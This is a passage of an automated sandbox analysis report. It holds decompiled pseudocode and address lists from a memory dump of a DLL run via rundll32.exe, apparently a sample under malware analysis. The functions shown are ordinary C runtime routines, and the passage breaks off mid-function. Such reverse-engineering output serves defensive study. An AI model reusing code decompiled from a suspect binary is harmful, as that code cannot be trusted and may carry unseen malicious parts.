0x00000000
0x10025ba9
0x10025bad
0x10025bd6
0x10025bd6
0x10025bd8
0x10025baf
0x10025baf
0x10025bb3
0x10025bb7
0x10025bbe
0x10025bc4
0x00000000
0x10025bc6
0x10025bc6
0x10025bc9
0x10025bcc
0x10025bd4
0x00000000
0x00000000
0x00000000
0x00000000
0x10025bd4
0x10025bc4
0x10025be3
0x10025be3
0x10025be5
0x10025c13
0x10025c13
0x00000000
0x10025be7
0x10025be7
0x10025bed
0x10025bee
0x10025bef
0x10025bf0
0x10025bf5
0x10025bfb
0x10025bfe
0x10025c00
0x10025c07
0x10025c09
0x10025c0b
0x10025c02
0x10025c02
0x10025c03
0x00000000
0x10025c03
0x10025c00
0x00000000
0x10025be5
0x10025bdc
0x10025bde
0x10025be1
0x10025be1
0x00000000
0x10025be1
0x10025c1a
0x10025c1a
0x10025c1b
0x10025c1e
0x10025c24
0x10025c24
0x10025c2d
0x10025c2f
0x00000000
0x10025c31
0x10025c31
0x10025c33
0x00000000
0x10025c35
0x10025c35
0x10025c35
0x10025c33
0x10025c2f
0x00000000
0x100259e9
0x100259e9
0x100259ee
0x00000000
0x100259f4
0x100259f4
0x100259f9
0x00000000
0x100259ff
0x100259ff
0x10025a05
0x10025a0a
0x10025a0c
0x10025a13
0x10025a14
0x10025a16
0x00000000
0x00000000
0x10025a1c
0x10025a1c
0x10025a20
0x10025a26
0x00000000
0x10025a2c
0x10025a2e
0x10025a2f
0x10025a32
0x00000000
0x10025a38
0x10025a38
0x10025a3e
0x10025a43
0x10025a4d
0x10025a51
0x10025a56
0x10025a59
0x10025a5b
0x00000000
0x10025a5d
0x10025a5d
0x10025a5f
0x10025a62
0x10025a62
0x10025a65
0x10025a68
0x10025a68
0x10025a73
0x10025a75
0x10025a77
0x00000000
0x00000000
0x10025a77
0x00000000
0x10025a79
0x10025a79
0x10025a7f
0x10025a82
0x10025a82
0x10025a90
0x10025a99
0x10025a9e
0x10025aa4
0x10025aa7
0x10025aa8
0x10025aaa
0x10025ab8
0x10025ab8
0x10025abf
0x10025b20
0x00000000
0x10025ac1
0x10025ac1
0x10025acf
0x10025ad4
0x10025ad7
0x10025ad9
0x10025c54
0x10025c56
0x10025c57
0x10025c58
0x10025c59
0x10025c5a
0x10025c5b
0x10025c60
0x10025c63
0x10025c64
0x10025c6c
0x10025c73
0x10025c76
0x10025c77
0x10025c7a
0x10025c7e
0x10025c7f
0x10025c82
0x10025c92
0x10025cb5
0x10025cba
0x10025cbd
0x10025cbf
0x10025f75
0x10025f75
0x10025f75
0x00000000
0x10025cc5
0x10025cc5
0x10025cc8
0x10025cc8
0x10025ccb
0x10025cd1
0x10025cd7
0x10025cda
0x10025cdc
0x10025cdf
0x10025ce6
0x10025ce9
0x10025cef
0x00000000
0x00000000
0x10025cf1
0x10025cf5
0x10025d1e
0x10025d1e
0x10025cf7
0x10025cf7
0x10025cfb
0x10025cff
0x10025d06
0x10025d0c
0x00000000
0x10025d0e
0x10025d0e
0x10025d11
0x10025d14
0x10025d1c
0x00000000
0x00000000
0x00000000
0x00000000
0x10025d1c
0x10025d0c
0x10025d2b
0x10025d2b
0x10025d2d
0x10025d36
0x10025d3c
0x10025d3f
0x10025d3f
0x10025d42
0x10025d45
0x10025d45
0x10025d55
0x10025d63
0x10025d68
0x10025d6f
0x10025d71
0x00000000
0x10025d77
0x10025d7d
0x10025d8a
0x10025d93
0x10025da6
0x10025dad
0x10025db2
0x10025db5
0x10025db7
0x10025ff5
0x10025ffb
0x10025ffc
0x10025ffd
0x10025ffe
0x10025fff
0x10026000
0x10026005
0x10026008
0x1002600f
0x1002600f
0x10026012
0x10026028
0x10026028
0x1002602b
0x10026014
0x10026014
0x10026014
0x10026017
0x10026025
0x10026027
0x10026019
0x10026019
0x1002601c
0x00000000
0x1002601e
0x10026020
0x10026022
0x10026022
0x1002601c
0x10026017
0x10025dbd
0x10025dbd
0x10025dcb
0x10025dce
0x10025de4
0x10025deb
0x10025df0
0x10025dd0
0x10025dd0
0x10025dd8
0x00000000
0x10025dda
0x10025dda
0x10025de0
0x10025de0
0x10025dd8
0x10025df7
0x10025dfe
0x10025e01
0x10025eff
0x10025f02
0x10025f0f
0x10025f12
0x10025f1a
0x10025f1a
0x10025f04
0x10025f0a
0x10025f0a
0x10025e07
0x10025e07
0x10025e13
0x10025e19
0x10025e1f
0x10025e22
0x10025e28
0x10025e2b
0x10025e2e
0x00000000
0x00000000
0x10025e30
0x10025e39
0x10025e3d
0x10025e46
0x10025e4a
0x10025e4b
0x10025e51
0x10025e57
0x10025e5d
0x10025e60
0x00000000
0x00000000
0x10025e62
0x10025e81
0x10025e81
0x10025e84
0x10025ea1
0x10025ea6
0x10025ea9
0x10025eab
0x10025ee9
0x10025ead
0x10025ead
0x10025eb3
0x10025eb8
0x10025ec0
0x10025ec1
0x10025ec1
0x10025ed8
0x10025edf
0x10025ee2
0x10025ee4
0x10025ee4
0x10025eef
0x10025ef5
0x10025ef5
0x10025efa
0x00000000
0x10025efa
0x10025e64
0x10025e66
0x10025e6b
0x10025e71
0x10025e7a
0x10025e7d
0x10025e7d
0x00000000
0x10025e66
0x10025f1d
0x10025f1d
0x10025f21
0x10025f29
0x10025f2f
0x10025f32
0x10025f38
0x10025f3a
0x10025f86
0x10025f8c
0x10025fd8
0x10025fd8
0x10025f8e
0x10025f93
0x10025f93
0x10025f99
0x10025f9d
0x00000000
0x10025f9f
0x10025fa3
0x10025fac
0x10025fb8
0x10025fbd
0x10025fc6
0x10025fcc
0x10025fcf
0x10025fcf
0x10025f9d
0x10025fde
0x10025fe6
0x10025fec
0x10025fef
0x10025f3c
0x10025f42
0x10025f4c
0x10025f5e
0x10025f65
0x10025f72
0x00000000
0x10025f72
0x00000000
0x10025f3a
0x10025db7
0x10025d2f
0x10025d2f
0x10025f77
0x10025f7c
0x10025f85
0x10025f85
0x00000000
0x10025d2d
0x10025d26
0x10025d28
0x10025d28
0x00000000
0x10025d28
0x10025adf
0x10025adf
0x10025ae2
0x10025ae7
0x10025c4f
0x00000000
0x10025aed
0x10025aef
0x10025af7
0x10025afd
0x10025afe
0x10025b04
0x10025b05
0x10025b0a
0x10025b10
0x10025b13
0x10025b15
0x10025b17
0x10025b18
0x10025b18
0x10025b26
0x10025b26
0x10025b29
0x10025b2c
0x10025b2e
0x10025b31
0x10025b33
0x10025b33
0x10025b36
0x10025b36
0x10025b39
0x10025b3c
0x00000000
0x10025b42
0x10025b42
0x10025b44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10025b44
0x10025b3c
0x10025ae7
0x10025ad9
0x10025aac
0x10025aae
0x10025aaf
0x10025ab2
0x00000000
0x00000000
0x00000000
0x00000000
0x10025ab2
0x10025aaa
0x10025a32
0x00000000
0x10025a26
0x10025b4a
0x00000000
0x10025b4a
0x100259f9
0x100259ee
0x100259e3
0x1002599c
0x1002599c
0x1002599e
0x100259b5
0x100259a0
0x100259a0
0x100259a1
0x100259a2
0x100259a3
0x100259a8
0x10025c40
0x10025c45
0x10025c4e
0x10025c4e
0x1002599a
0x00000000

APIs

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 100258E5
_free.LIBCMT ref: 100258FC
_free.LIBCMT ref: 10025919
_free.LIBCMT ref: 10025934
_free.LIBCMT ref: 1002594B

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction ID: b32e4abf061af2b49d691e16b66c44ce7c89ffe3064c7ed98f8274118a3d5f98
Opcode Fuzzy Hash: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction Fuzzy Hash: 3251F471A00705EFDB11CF69EC41B6A73F4FF48765B914569E84AE7250EB32EA40CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1003939F, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1003939F(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E10024468(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E1002449E(__eflags);
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(__eflags > 0) {
						goto L6;
					}
				}
				return _t21;
			}

0x1003939f
0x100393ab
0x100393bd
0x100393bf
0x100393c6
0x1003941b
0x00000000
0x1003941b
0x100393ce
0x100393d8
0x100393de
0x100393e1
0x100393e4
0x100393ea
0x100393ec
0x00000000
0x00000000
0x100393ee
0x100393f1
0x100393f4
0x100393f6
0x100393ff
0x100393ff
0x1003940a
0x10039410
0x10039415
0x00000000
0x10039415
0x100393f8
0x100393fd
0x00000000
0x00000000
0x100393fd
0x10039420

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 100393B5
GetLastError.KERNEL32(?,?,?), ref: 100393BF
__dosmaperr.LIBCMT ref: 100393C6
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 100393E4
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1003940A

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction ID: b407cb5834295830b04853e8380503d0af7682c42ed55c8a01c32ac15598fb64
Opcode Fuzzy Hash: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction Fuzzy Hash: C6015371901129FFDB12EFA1CC4899F3FBDEF017A1F518554F8249A1A0CB309A81DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002F136, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F136(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1004d788; // 0x1004d7dc
					if(_t23 != 0) {
						E100268B3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1004d78c; // 0x1004e868
					if(_t24 != 0) {
						E100268B3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1004d790; // 0x1004e868
					if(_t25 != 0) {
						E100268B3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1004d7b8; // 0x1004d7e0
					if(_t26 != 0) {
						E100268B3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1004d7bc; // 0x1004e86c
					if(_t27 != 0) {
						return E100268B3(_t6);
					}
				}
				return _t6;
			}

0x1002f13c
0x1002f141
0x1002f145
0x1002f14b
0x1002f14e
0x1002f153
0x1002f157
0x1002f15d
0x1002f160
0x1002f165
0x1002f169
0x1002f16f
0x1002f172
0x1002f177
0x1002f17b
0x1002f181
0x1002f184
0x1002f189
0x1002f18a
0x1002f18d
0x1002f193
0x00000000
0x1002f19b
0x1002f193
0x1002f19e

APIs

_free.LIBCMT ref: 1002F14E

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F160
_free.LIBCMT ref: 1002F172
_free.LIBCMT ref: 1002F184
_free.LIBCMT ref: 1002F196

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction ID: 6117e9590aa72a6bc89c84abd52b3ea92389668d0d0b3033db3b93dc22f4f4dd
Opcode Fuzzy Hash: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction Fuzzy Hash: 70F09631508210D7E650EBA4FEC6C2673E9EA053D43E0492EF458D7600CB30FC808E94

Uniqueness

Uniqueness Score: -1.00%

Function 10010849, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10010849(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E100282F8(_t48);
						E10027C80(_t57, 0, 0x1004e070, 0x104);
						_t26 =  *0x1004e540; // 0x4b2c48
						 *0x1004e52c = 0x1004e070;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x1004e070;
							_v20 = 0x1004e070;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E10010F75(E10010AE4( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E10010AE4( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E10027ABF(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x1004e534 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x1004e538 = _t58;
											L18:
											E100268B3(_t37);
											_v12 = 0;
											L19:
											E100268B3(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x1004e534 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x1004e538 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E1002449E(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E1002449E(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E1000E314();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x10010849
0x10010852
0x10010857
0x10010861
0x10010864
0x10010881
0x10010882
0x10010895
0x1001089a
0x100108a2
0x100108a8
0x100108ab
0x100108ad
0x100108b4
0x100108b4
0x100108b6
0x100108b9
0x100108bc
0x100108c3
0x100108dc
0x100108e1
0x100108e3
0x10010904
0x1001090c
0x1001090f
0x1001092a
0x1001092d
0x10010934
0x10010938
0x1001093a
0x10010941
0x10010944
0x10010946
0x10010948
0x1001094a
0x10010954
0x10010954
0x10010956
0x1001095c
0x1001095f
0x10010961
0x10010967
0x10010968
0x1001096e
0x10010971
0x10010972
0x10010978
0x1001097b
0x00000000
0x00000000
0x00000000
0x00000000
0x1001094c
0x1001094c
0x1001094c
0x1001094f
0x10010950
0x10010950
0x00000000
0x1001094c
0x1001093c
0x00000000
0x1001093c
0x10010914
0x10010914
0x10010915
0x1001091a
0x1001091c
0x1001091e
0x10010923
0x10010923
0x00000000
0x10010923
0x100108e5
0x100108ea
0x100108ec
0x100108ed
0x00000000
0x100108ed
0x100108af
0x100108b2
0x00000000
0x00000000
0x00000000
0x100108b2
0x10010866
0x10010869
0x00000000
0x00000000
0x1001086b
0x10010872
0x10010873
0x10010875
0x1001087a
0x00000000
0x1001087a
0x00000000

Strings

H,K, xrefs: 1001089A
C:\Windows\SysWOW64\rundll32.exe, xrefs: 1001088C, 10010893, 100108C9

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe$H,K
API String ID: 0-2933037614
Opcode ID: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction ID: 4195f098a662b01fce56375507ef603a022793ef94c33478d48d106903ee8a7f
Opcode Fuzzy Hash: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction Fuzzy Hash: 7841B375B04254AFEB11DB99DD8199EBBF8EF85350F100066F884DB252EAB0DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100055B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E100055B0(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t34 = __ecx;
				_t33 = __ebx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E10005A3D(_t33, _t34, _t38, _t42);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E10005A3D(_t33, _t34, _t38, _t42);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t42) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t43) + 0x14)) = _t43;
						E1001200F(__ebx, __ecx, _t38, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_push(_t43);
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E10005A3D(_t33, __ecx, _t38, _t44) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							_push( &_v16);
							_push(0x1004d938);
							 *_t44 = E10005672(_t33, _t40);
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

0x100055b0
0x100055b0
0x100055b4
0x100055b7
0x100055b8
0x100055c0
0x100055d4
0x100055d9
0x100055dd
0x100055df
0x100055e4
0x100055e4
0x100055e4
0x100055e4
0x100055ca
0x100055d0
0x100055f2
0x100055f5
0x100055fd
0x10005600
0x10005605
0x10005609
0x1000560a
0x1000560b
0x1000560c
0x1000560f
0x10005617
0x1000561a
0x1000561c
0x1000564d
0x1000564d
0x00000000
0x1000564d
0x1000561e
0x10005621
0x10005623
0x00000000
0x00000000
0x10005625
0x10005628
0x10005634
0x10005634
0x10005634
0x10005638
0x1000563e
0x1000563f
0x1000564b
0x00000000
0x1000564b
0x00000000
0x00000000
0x100055d2
0x100055d0
0x100055ec

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 10005644

Strings

csm, xrefs: 100055CA
MOC, xrefs: 100055C2
RCC, xrefs: 100055BA

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction ID: ba491e0a52f827d7fd065b4ce93cba473ca224792a09d2010a1ea98d05584bc9
Opcode Fuzzy Hash: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction Fuzzy Hash: 24116075504204DFEB08DF64C841A9BB7F8EF052D7F51009AE8418B265E776FE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1003BC37, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003BC37(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E100322AE(_t33) != 0xffffffff) {
					_t13 =  *0x1004e628; // 0x4f7c78
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E100322AE(2);
						if(E100322AE(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E100322AE(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E1003221D(_t33);
						 *((char*)( *((intOrPtr*)(0x1004e628 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E10024468(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x1003bc3e
0x1003bc4b
0x1003bc51
0x1003bc59
0x1003bc67
0x00000000
0x00000000
0x00000000
0x00000000
0x1003bc6f
0x1003bc6f
0x1003bc71
0x1003bc83
0x00000000
0x00000000
0x1003bc85
0x1003bc95
0x00000000
0x00000000
0x1003bc9d
0x1003bc9f
0x1003bca0
0x1003bcb8
0x1003bcbf
0x00000000
0x1003bccd
0x00000000
0x1003bcc8
0x1003bc59
0x1003bc4d
0x1003bc4d
0x00000000

APIs

CloseHandle.KERNEL32(00000000), ref: 1003BC8D
GetLastError.KERNEL32(?,1003BA56,?,1004B6E0,0000000C,1003BC17,?,?,?), ref: 1003BC97
__dosmaperr.LIBCMT ref: 1003BCC2

Strings

x|O, xrefs: 1003BC51

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: x|O
API String ID: 2583163307-3226110465
Opcode ID: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction ID: 5a95298400e09611cdde6b48d7188b83264b713d2b6cc128102f312a6002e825
Opcode Fuzzy Hash: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction Fuzzy Hash: DC012F32A155601ED227D3345D96B5E2789CBC377AF270159EE08DF1D2DE60AC818190

Uniqueness

Uniqueness Score: -1.00%

Function 1000D7D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D7D1(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x1000d7de
0x1000d7e6
0x1000d81b
0x1000d7e8
0x1000d7f1
0x00000000
0x1000d818
0x1000d817
0x1000d817

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1000D78C), ref: 1000D7DE
GetLastError.KERNEL32(?,1000D78C), ref: 1000D7E8
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1000D810

Strings

api-ms-, xrefs: 1000D7F5

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction ID: e74e9b093023e81d82c4867d880b496c8476b2db1d57206d9312647a4de92240
Opcode Fuzzy Hash: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction Fuzzy Hash: D4E04830380249B7FF006F60DD46B4D3B58EB11AC1F60C431FA0CE80F5DB61A85586A8

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2F3, Relevance: 6.3, APIs: 4, Instructions: 320
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E1002D2F3(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
